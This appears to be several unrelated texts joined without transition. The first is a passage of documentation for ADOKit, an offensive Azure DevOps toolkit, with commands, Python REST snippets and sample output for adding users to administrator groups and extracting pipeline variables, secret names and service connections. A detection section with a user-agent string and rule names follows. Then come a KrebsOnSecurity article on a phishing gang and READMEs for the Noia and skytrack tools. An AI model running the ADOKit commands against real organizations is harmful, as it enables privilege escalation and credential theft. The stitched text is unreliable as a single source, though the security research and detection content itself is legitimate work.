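    The add/remove modules in this part of the documentation correspond to membership changes that the Azure DevOps Graph REST API expresses as a PUT (add) or DELETE (remove) on a membership resource. The sketch below is a hedged illustration with hypothetical descriptors, not ADOKit's internal code.

    import requests

    ORG = "YourOrganization"                 # placeholder
    PAT = "apiKey"                           # placeholder
    USER_DESCRIPTOR = "aad.EXAMPLEUSER"      # hypothetical descriptor of the user to add
    GROUP_DESCRIPTOR = "vssgp.EXAMPLEGROUP"  # hypothetical descriptor of the target admin group

    # PUT creates the membership (user joins group); DELETE on the same URL removes it.
    # The api-version value may differ in your organization.
    url = (f"https://vssps.dev.azure.com/{ORG}/_apis/graph/memberships/"
           f"{USER_DESCRIPTOR}/{GROUP_DESCRIPTOR}?api-version=7.1-preview.1")
    resp = requests.put(url, auth=("", PAT))
    print("Membership add returned HTTP", resp.status_code)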

    Remove Project Admin

    Use Case

    Remove a user from the Project Administrators group for a given project.

    Syntax

    Provide the removeprojectadmin module along with a /project: and /user: for a given user to be removed from the Project Administrators group for the given project. Additionally, provide any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

    ADOKit.exe removeprojectadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

    ADOKit.exe removeprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

    Example Output

    C:\>ADOKit.exe removeprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"

    ==================================================
    Module: removeprojectadmin
    Auth Type: Cookie
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/4/2023 3:19:43 PM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.


    [*] INFO: Attempting to remove user1 from the Project Administrators group for the maraudersmap project.

    [+] SUCCESS: User successfully removed

    Group | Mail Address | Display Name
    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    [MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins

    4/4/23 19:19:44 Finished execution of removeprojectadmin

    Add Build Admin

    Use Case

    Add a user to the Build Administrators group for a given project.

    Syntax

    Provide the addbuildadmin module along with a /project: and /user: for a given user to be added to the Build Administrators group for the given project. Additionally, provide any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

    ADOKit.exe addbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

    ADOKit.exe addbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

    Example Output

    C:\>ADOKit.exe addbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"

    ==================================================
    Module: addbuildadmin
    Auth Type: Cookie
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/4/2023 3:41:51 PM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.


    [*] INFO: Attempting to add user1 to the Build Administrators group for the maraudersmap project.

    [+] SUCCESS: User successfully added

    Group | Mail Address | Display Name
    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    [MaraudersMap]\Build Administrators | user1@YourOrganization.onmicrosoft.com | User 1

    4/4/23 19:41:55 Finished execution of addbuildadmin

    Remove Build Admin

    Use Case

    Remove a user from the Build Administrators group for a given project.

    Syntax

    Provide the removebuildadmin module along with a /project: and /user: for a given user to be removed from the Build Administrators group for the given project. Additionally, provide any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

    ADOKit.exe removebuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

    ADOKit.exe removebuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

    Example Output

    C:\>ADOKit.exe removebuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"

    ==================================================
    Module: removebuildadmin
    Auth Type: Cookie
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/4/2023 3:42:10 PM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.


    [*] INFO: Attempting to remove user1 from the Build Administrators group for the maraudersmap project.

    [+] SUCCESS: User successfully removed

    Group | Mail Address | Display Name
    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

    4/4/23 19:42:11 Finished execution of removebuildadmin

    Add Collection Admin

    Use Case

    Add a user to the Project Collection Administrators group.

    Syntax

    Provide the addcollectionadmin module along with a /user: for a given user to be added to the Project Collection Administrators group. Additionally, provide any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

    ADOKit.exe addcollectionadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

    ADOKit.exe addcollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

    Example Output

    C:\>ADOKit.exe addcollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

    ==================================================
    Module: addcollectionadmin
    Auth Type: Cookie
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/4/2023 4:04:40 PM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.


    [*] INFO: Attempting to add user1 to the Project Collection Administrators group.

    [+] SUCCESS: User successfully added

    Group | Mail Address | Display Name
    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    [YourOrganization]\Project Collection Administrators | jsmith@YourOrganization.onmicrosoft.com | John Smith
    [YourOrganization]\Project Collection Administrators | user1@YourOrganization.onmicrosoft.com | User 1

    4/4/23 20:04:43 Finished execution of addcollectionadmin

    Remove Collection Admin

    Use Case

    Remove a user from the Project Collection Administrators group.

    Syntax

    Provide the removecollectionadmin module along with a /user: for a given user to be removed from the Project Collection Administrators group. Additionally, provide any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

    ADOKit.exe removecollectionadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

    ADOKit.exe removecollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

    Example Output

    C:\>ADOKit.exe removecollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

    ==================================================
    Module: removecollectionadmin
    Auth Type: Cookie
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/4/2023 4:10:35 PM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.


    [*] INFO: Attempting to remove user1 from the Project Collection Administrators group.

    [+] SUCCESS: User successfully removed

    Group | Mail Address | Display Name
    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    [YourOrganization]\Project Collection Administrators | jsmith@YourOrganization.onmicrosoft.com | John Smith

    4/4/23 20:10:38 Finished execution of removecollectionadmin

    Add Collection Build Admin

    Use Case

    Add a user to the Project Collection Build Administrators group.

    Syntax

    Provide the addcollectionbuildadmin module along with a /user: for a given user to be added to the Project Collection Build Administrators group. Additionally, provide any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

    ADOKit.exe addcollectionbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

    ADOKit.exe addcollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

    Example Output

    C:\>ADOKit.exe addcollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

    ==================================================
    Module: addcollectionbuildadmin
    Auth Type: Cookie
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/5/2023 8:21:39 AM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.


    [*] INFO: Attempting to add user1 to the Project Collection Build Administrators group.

    [+] SUCCESS: User successfully added

    Group | Mail Address | Display Name
    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    [YourOrganization]\Project Collection Build Administrators | user1@YourOrganization.onmicrosoft.com | User 1

    4/5/23 12:21:42 Finished execution of addcollectionbuildadmin

    Remove Collection Build Admin

    Use Case

    Remove a user from the Project Collection Build Administrators group.

    Syntax

    Provide the removecollectionbuildadmin module along with a /user: for a given user to be removed from the Project Collection Build Administrators group. Additionally, provide any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

    ADOKit.exe removecollectionbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

    ADOKit.exe removecollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

    Example Output

    C:\>ADOKit.exe removecollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

    ==================================================
    Module: removecollectionbuildadmin
    Auth Type: Cookie
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/5/2023 8:21:59 AM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.


    [*] INFO: Attempting to remove user1 from the Project Collection Build Administrators group.

    [+] SUCCESS: User successfully removed

    Group | Mail Address | Display Name
    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

    4/5/23 12:22:02 Finished execution of removecollectionbuildadmin

    Add Collection Build Service Account

    Use Case

    Add a user to the Project Collection Build Service Accounts group.

    Syntax

    Provide the addcollectionbuildsvc module along with a /user: for a given user to be added to the Project Collection Build Service Accounts group. Additionally, provide any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

    ADOKit.exe addcollectionbuildsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

    ADOKit.exe addcollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

    Example Output

    C:\>ADOKit.exe addcollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

    ==================================================
    Module: addcollectionbuildsvc
    Auth Type: Cookie
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/5/2023 8:22:13 AM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.


    [*] INFO: Attempting to add user1 to the Project Collection Build Service Accounts group.

    [+] SUCCESS: User successfully added

    Group | Mail Address | Display Name
    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    [YourOrganization]\Project Collection Build Service Accounts | user1@YourOrganization.onmicrosoft.com | User 1

    4/5/23 12:22:15 Finished execution of addcollectionbuildsvc

    Remove Collection Build Service Account

    Use Case

    Remove a user from the Project Collection Build Service Accounts group.

    Syntax

    Provide the removecollectionbuildsvc module along with a /user: for a given user to be removed from the Project Collection Build Service Accounts group. Additionally, provide any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

    ADOKit.exe removecollectionbuildsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

    ADOKit.exe removecollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

    Example Output

    C:\>ADOKit.exe removecollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

    ==================================================
    Module: removecollectionbuildsvc
    Auth Type: Cookie
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/5/2023 8:22:27 AM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.


    [*] INFO: Attempting to remove user1 from the Project Collection Build Service Accounts group.

    [+] SUCCESS: User successfully removed

    Group | Mail Address | Display Name
    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

    4/5/23 12:22:28 Finished execution of removecollectionbuildsvc

    Add Collection Service Account

    Use Case

    Add a user to the Project Collection Service Accounts group.

    Syntax

    Provide the addcollectionsvc module along with a /user: for a given user to be added to the Project Collection Service Accounts group. Additionally, provide any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

    ADOKit.exe addcollectionsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

    ADOKit.exe addcollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

    Example Output

    C:\>ADOKit.exe addcollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

    ==================================================
    Module: addcollectionsvc
    Auth Type: Cookie
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/5/2023 11:21:01 AM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.


    [*] INFO: Attempting to add user1 to the Project Collection Service Accounts group.

    [+] SUCCESS: User successfully added

    Group | Mail Address | Display Name
    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    [YourOrganization]\Project Collection Service Accounts | jsmith@YourOrganization.onmicrosoft.com | John Smith
    [YourOrganization]\Project Collection Service Accounts | user1@YourOrganization.onmicrosoft.com | User 1

    4/5/23 15:21:04 Finished execution of addcollectionsvc

    Remove Collection Service Account

    Use Case

    Remove a user from the Project Collection Service Accounts group.

    Syntax

    Provide the removecollectionsvc module along with a /user: for a given user to be removed from the Project Collection Service Accounts group. Additionally, provide any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

    ADOKit.exe removecollectionsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

    ADOKit.exe removecollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

    Example Output

    C:\>ADOKit.exe removecollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

    ==================================================
    Module: removecollectionsvc
    Auth Type: Cookie
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/5/2023 11:21:43 AM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.


    [*] INFO: Attempting to remove user1 from the Project Collection Service Accounts group.

    [+] SUCCESS: User successfully removed

    Group | Mail Address | Display Name
    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    [YourOrganization]\Project Collection Service Accounts | jsmith@YourOrganization.onmicrosoft.com | John Smith

    4/5/23 15:21:44 Finished execution of removecollectionsvc

    Get Pipeline Variables

    Use Case

    Extract any pipeline variables being used in project(s), which could contain credentials or other useful information.

    Syntax

    Provide the getpipelinevars module along with a /project: for a given project to extract any pipeline variables being used. If you would like to extract pipeline variables from all projects, specify all in the /project: argument.

    ADOKit.exe getpipelinevars /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"

    ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"

    ADOKit.exe getpipelinevars /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"

    ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"

    Example Output

    C:\>ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"

    ==================================================
    Module: getpipelinevars
    Auth Type: Cookie
    Project: maraudersmap
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/6/2023 12:08:35 PM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.

    Pipeline Var Name | Pipeline Var Value
    -----------------------------------------------------------------------------------
    credential | P@ssw0rd123!
    url | http://blah/

    4/6/23 16:08:36 Finished execution of getpipelinevars
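
    Pipeline variables such as these live on the build (pipeline) definition object, which is retrievable through the Build Definitions REST API. Below is a minimal sketch under placeholder assumptions (organization, project, PAT, api-version); variables flagged isSecret come back without a value, which appears to be why getpipelinesecrets reports them as [HIDDEN].

    import requests

    ORG, PROJECT, PAT = "YourOrganization", "maraudersmap", "apiKey"   # placeholders
    base = f"https://dev.azure.com/{ORG}/{PROJECT}/_apis/build/definitions"

    # List the pipeline definitions in the project...
    defs = requests.get(f"{base}?api-version=7.1-preview.7", auth=("", PAT)).json()

    for d in defs.get("value", []):
        # ...then fetch each definition in full; variables live on the detailed object.
        detail = requests.get(f'{base}/{d["id"]}?api-version=7.1-preview.7',
                              auth=("", PAT)).json()
        for name, var in (detail.get("variables") or {}).items():
            value = "[HIDDEN]" if var.get("isSecret") else var.get("value")
            print(f"{name} | {value}")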

    Get Pipeline Secrets

    Use Case

    Extract the names of any pipeline secrets being used in project(s), which will direct the operator where to attempt to perform secret extraction.

    Syntax

    Provide the getpipelinesecrets module along with a /project: for a given project to extract the names of any pipeline secrets being used. If you would like to extract the names of pipeline secrets from all projects, specify all in the /project: argument.

    ADOKit.exe getpipelinesecrets /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"

    ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"

    ADOKit.exe getpipelinesecrets /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"

    ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"

    Example Output

    C:\>ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"

    ==================================================
    Module: getpipelinesecrets
    Auth Type: Cookie
    Project: maraudersmap
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/10/2023 10:28:37 AM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.

    Build Secret Name | Build Secret Value
    -----------------------------------------------------
    anotherSecretPass | [HIDDEN]
    secretpass | [HIDDEN]

    4/10/23 14:28:38 Finished execution of getpipelinesecrets

    Get Service Connections

    Use Case

    List any service connections being used in project(s), which will direct the operator where to attempt to perform credential extraction for any service connections being used.

    Syntax

    Provide the getserviceconnections module along with a /project: for a given project to list any service connections being used. If you would like to list service connections from all projects, specify all in the /project: argument.

    ADOKit.exe getserviceconnections /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"

    ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"

    ADOKit.exe getserviceconnections /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"

    ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"

    Example Output

    C:\>ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"

    ==================================================
    Module: getserviceconnections
    Auth Type: Cookie
    Project: maraudersmap
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/11/2023 8:34:16 AM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.

    Connection Name | Connection Type | ID
    --------------------------------------------------------------------------------------------------------------------------------------------------
    Test Connection Name | generic | 195d960c-742b-4a22-a1f2-abd2c8c9b228
    Not Real Connection | generic | cd74557e-2797-498f-9a13-6df692c22cac
    Azure subscription 1(47c5aaab-dbda-44ca-802e-00801de4db23) | azurerm | 5665ed5f-3575-4703-a94d-00681fdffb04
    Azure subscription 1(1)(47c5aaab-dbda-44ca-802e-00801de4db23) | azurerm | df8c023b-b5ad-4925-a53d-bb29f032c382

    4/11/23 12:34:16 Finished execution of getserviceconnections
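
    Service connection metadata like this is available from the Service Endpoints REST API; the listing call returns names, types, and IDs but not the stored secrets themselves. A minimal sketch under the same placeholder assumptions (organization, project, PAT, api-version):

    import requests

    ORG, PROJECT, PAT = "YourOrganization", "maraudersmap", "apiKey"   # placeholders

    # Each endpoint entry mirrors ADOKit's Connection Name | Connection Type | ID columns.
    url = (f"https://dev.azure.com/{ORG}/{PROJECT}/_apis/serviceendpoint/"
           f"endpoints?api-version=7.1-preview.4")
    resp = requests.get(url, auth=("", PAT))
    resp.raise_for_status()

    for ep in resp.json().get("value", []):
        print(f'{ep.get("name")} | {ep.get("type")} | {ep.get("id")}')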

    Detection

    Below are static signatures for the specific usage of this tool in its default state:

    • Project GUID - {60BC266D-1ED5-4AB5-B0DD-E1001C3B1498}
    • See ADOKit Yara Rule in this repo.
    • User Agent String - ADOKit-21e233d4334f9703d1a3a42b6e2efd38
    • See ADOKit Snort Rule in this repo.
    • Microsoft Sentinel Rules
    • ADOKitUsage.json - Detects the usage of ADOKit with any auditable event (e.g., adding a user to a group)
    • PersistenceTechniqueWithADOKit.json - Detects the creation of a PAT or SSH key with ADOKit

    For detection guidance on the techniques used by the tool, see the X-Force Red whitepaper.
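
    As a complement to the Yara, Snort, and Sentinel content in the repo, the static user agent string listed above can also be hunted for in ordinary web proxy or access logs. The snippet below is a generic, illustrative example; the log path and format are assumptions and are not part of ADOKit.

    # Hypothetical example: flag any log line containing the default ADOKit user agent.
    ADOKIT_UA = "ADOKit-21e233d4334f9703d1a3a42b6e2efd38"

    with open("/var/log/proxy/access.log", encoding="utf-8", errors="ignore") as log:
        for lineno, line in enumerate(log, start=1):
            if ADOKIT_UA in line:
                print(f"[!] Possible ADOKit usage at line {lineno}: {line.strip()}")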

    Roadmap

    • Support for Azure DevOps Server

    References

    • https://learn.microsoft.com/en-us/rest/api/azure/devops/?view=azure-devops-rest-7.1
    • https://learn.microsoft.com/en-us/azure/devops/user-guide/what-is-azure-devops?view=azure-devops


    ‘The Manipulaters’ Improve Phishing, Still Fail at Opsec

    Roughly nine years ago, KrebsOnSecurity profiled a Pakistan-based cybercrime group called “The Manipulaters,” a sprawling web hosting network of phishing and spam delivery platforms. In January 2024, The Manipulaters pleaded with this author to unpublish previous stories about their work, claiming the group had turned over a new leaf and gone legitimate. But new research suggests that while they have improved the quality of their products and services, these nitwits still fail spectacularly at hiding their illegal activities.

    In May 2015, KrebsOnSecurity published a brief writeup about the brazen Manipulaters team, noting that they openly operated hundreds of web sites selling tools designed to trick people into giving up usernames and passwords, or deploying malicious software on their PCs.

    Manipulaters advertisement for “Office 365 Private Page with Antibot” phishing kit sold on the domain heartsender[.]com. “Antibot” refers to functionality that attempts to evade automated detection techniques, keeping a phish deployed as long as possible. Image: DomainTools.

    The core brand of The Manipulaters has long been a shared cybercriminal identity named “Saim Raza,” who for the past decade has peddled a popular spamming and phishing service variously called “Fudtools,” “Fudpage,” “Fudsender,” “FudCo,” etc. The term “FUD” in those names stands for “Fully Un-Detectable,” and it refers to cybercrime resources that will evade detection by security tools like antivirus software or anti-spam appliances.

    A September 2021 story here checked in on The Manipulaters, and found that Saim Raza and company were prospering under their FudCo brands, which they secretly managed from a front company called We Code Solutions.

    That piece worked backwards from all of the known Saim Raza email addresses to identify Facebook profiles for multiple We Code Solutions employees, many of whom could be seen celebrating company anniversaries gathered around a giant cake with the words “FudCo” painted in icing.

    Since that story ran, KrebsOnSecurity has heard from this Saim Raza identity on two occasions. The first was in the weeks following the Sept. 2021 piece, when one of Saim Raza’s known email addresses — bluebtcus@gmail.com — pleaded to have the story taken down.

    “Hello, we already leave that fud etc before year,” the Saim Raza identity wrote. “Why you post us? Why you destroy our lifes? We never harm anyone. Please remove it.”

    Not wishing to be manipulated by a phishing gang, KrebsOnSecurity ignored those entreaties. But on Jan. 14, 2024, KrebsOnSecurity heard from the same bluebtcus@gmail.com address, apropos of nothing.

    “Please remove this article,” Saim Raza wrote, linking to the 2021 profile. “Please already my police register case on me. I already leave everything.”

    Asked to elaborate on the police investigation, Saim Raza said they were freshly released from jail.

    “I was there many days,” the reply explained. “Now back after bail. Now I want to start my new work.”

    Exactly what that “new work” might entail, Saim Raza wouldn’t say. But a new report from researchers at DomainTools.com finds that several computers associated with The Manipulaters have been massively hacked by malicious data- and password-snarfing malware for quite some time.

    DomainTools says the malware infections on Manipulaters PCs exposed “vast swaths of account-related data along with an outline of the group’s membership, operations, and position in the broader underground economy.”

    “Curiously, the large subset of identified Manipulaters customers appear to be compromised by the same stealer malware,” DomainTools wrote. “All observed customer malware infections began after the initial compromise of Manipulaters PCs, which raises a number of questions regarding the origin of those infections.”

    A number of questions, indeed. The core Manipulaters product these days is a spam delivery service called HeartSender, whose homepage openly advertises phishing kits targeting users of various Internet companies, including Microsoft 365, Yahoo, AOL, Intuit, iCloud and ID.me, to name a few.

    A screenshot of the homepage of HeartSender 4 displays an IP address tied to fudtoolshop@gmail.com. Image: DomainTools.

    HeartSender customers can interact with the subscription service via the website, but the product appears to be far more effective and user-friendly if one downloads HeartSender as a Windows executable program. Whether that HeartSender program was somehow compromised and used to infect the service’s customers is unknown.

    However, DomainTools also found the hosted version of HeartSender service leaks an extraordinary amount of user information that probably is not intended to be publicly accessible. Apparently, the HeartSender web interface has several webpages that are accessible to unauthenticated users, exposing customer credentials along with support requests to HeartSender developers.

    “Ironically, the Manipulaters may create more short-term risk to their own customers than law enforcement,” DomainTools wrote. “The data table “User Feedbacks” (sic) exposes what appear to be customer authentication tokens, user identifiers, and even a customer support request that exposes root-level SMTP credentials–all visible by an unauthenticated user on a Manipulaters-controlled domain. Given the risk for abuse, this domain will not be published.”

    This is hardly the first time The Manipulaters have shot themselves in the foot. In 2019, The Manipulaters failed to renew their core domain name — manipulaters[.]com — the same one tied to so many of the company’s past and current business operations. That domain was quickly scooped up by Scylla Intel, a cyber intelligence firm that focuses on connecting cybercriminals to their real-life identities.

    Currently, The Manipulaters seem focused on building out and supporting HeartSender, which specializes in spam and email-to-SMS spamming services.

    “The Manipulaters’ newfound interest in email-to-SMS spam could be in response to the massive increase in smishing activity impersonating the USPS,” DomainTools wrote. “Proofs posted on HeartSender’s Telegram channel contain numerous references to postal service impersonation, including proving delivery of USPS-themed phishing lures and the sale of a USPS phishing kit.”

    Reached via email, the Saim Raza identity declined to respond to questions about the DomainTools findings.

    “First [of] all we never work on virus or compromised computer etc,” Raza replied. “If you want to write like that fake go ahead. Second I leave country already. If someone bind anything with exe file and spread on internet its not my fault.”

    Asked why they left Pakistan, Saim Raza said the authorities there just wanted to shake them down.

    “After your article our police put FIR on my [identity],” Saim Raza explained. “FIR” in this case stands for “First Information Report,” which is the initial complaint in the criminal justice system of Pakistan.

    “They only get money from me nothing else,” Saim Raza continued. “Now some officers ask for money again again. Brother, there is no good law in Pakistan just they need money.”

    Saim Raza has a history of being slippery with the truth, so who knows whether The Manipulaters and/or its leaders have in fact fled Pakistan (it may be more of an extended vacation abroad). With any luck, these guys will soon venture into a more Western-friendly, “good law” nation and receive a warm welcome by the local authorities.

    Noia - Simple Mobile Applications Sandbox File Browser Tool

    By: Zion3R


    Noia is a web-based tool whose main aim is to ease the process of browsing mobile application sandboxes and directly previewing SQLite databases, images, and more. Powered by frida.re.

    Please note that I'm not a programmer, but I'm probably above the median in code-savviness. Try it out, and open an issue if you find any problems. PRs are welcome.


    Installation & Usage

    npm install -g noia
    noia

    Features

    • Explore third-party application files and directories. Noia shows you details including access permissions, file type and much more.

    • View custom binary files. Directly preview SQLite databases, images, and more.

    • Search application by name.

    • Search files and directories by name.

    • Navigate to a custom directory using the ctrl+g shortcut.

    • Download the application files and directories for further analysis.

    • Basic iOS support

    and more


    Setup

    Desktop requirements:

    • node.js LTS and npm
    • Any decent modern desktop browser

    Noia is available on npm, so just type the following command to install it and run it:

    npm install -g noia
    noia

    Device setup:

    Noia is powered by frida.re, thus requires Frida to run.
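
    If you want to confirm the Frida side is working before launching Noia, a quick sanity check with Frida's Python bindings (an optional, illustrative step, not part of Noia itself) could look like this:

    import frida  # pip install frida; frida-server must be running on the device

    # Enumerate processes on the USB-attached device; if this succeeds,
    # Frida-based tools such as Noia should be able to attach as well.
    device = frida.get_usb_device()
    for proc in device.enumerate_processes()[:10]:
        print(proc.pid, proc.name)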

    Rooted Device

    See:

    • https://frida.re/docs/android/
    • https://frida.re/docs/ios/

    Non-rooted Device

    • https://koz.io/using-frida-on-android-without-root/
    • https://github.com/sensepost/objection/wiki/Patching-Android-Applications
    • https://nowsecure.com/blog/2020/01/02/how-to-conduct-jailed-testing-with-frida/

    Security Warning

    This tool is not secure and may contain security vulnerabilities, so make sure to isolate the webpage from potential attackers.

    LICENCE

    MIT



    Skytrack - Planespotting And Aircraft OSINT Tool Made Using Python

    By: Zion3R

    About

    skytrack is a command-line based plane spotting and aircraft OSINT reconnaissance tool made using Python. It can gather aircraft information using various data sources, generate a PDF report for a specified aircraft, and convert between ICAO and Tail Number designations. Whether you are a hobbyist plane spotter or an experienced aircraft analyst, skytrack can help you identify and enumerate aircraft for general purpose reconnaissance.


    What is Planespotting & Aircraft OSINT?

    Planespotting is the art of tracking down and observing aircraft. While planespotting mostly consists of photography and videography of aircraft, aircraft information gathering and OSINT is a crucial step in the planespotting process. OSINT (Open Source Intelligence) describes a methodology of using publicly accessible data sources to obtain data about a specific subject — in this case, planes!

    Aircraft Information

    • Tail Number 🛫
    • Aircraft Type ⚙️
    • ICAO24 Designation 🔎
    • Manufacturer Details 🛠
    • Flight Logs 📄
    • Aircraft Owner ✈️
    • Model 🛩
    • Much more!

    Usage

    To run skytrack on your machine, follow the steps below:

    $ git clone https://github.com/ANG13T/skytrack
    $ cd skytrack
    $ pip install -r requirements.txt
    $ python skytrack.py

    skytrack works best with Python 3.

    Preview

    Features

    skytrack features three main functions for aircraft information gathering and display options. They include the following:

    Aircraft Reconnaissance & OSINT

    skytrack obtains general information about the aircraft given its tail number or ICAO designator. The tool sources this information using several reliable data sets. Once the data is collected, it is displayed in the terminal within a table layout.

    PDF Aircraft Information Report

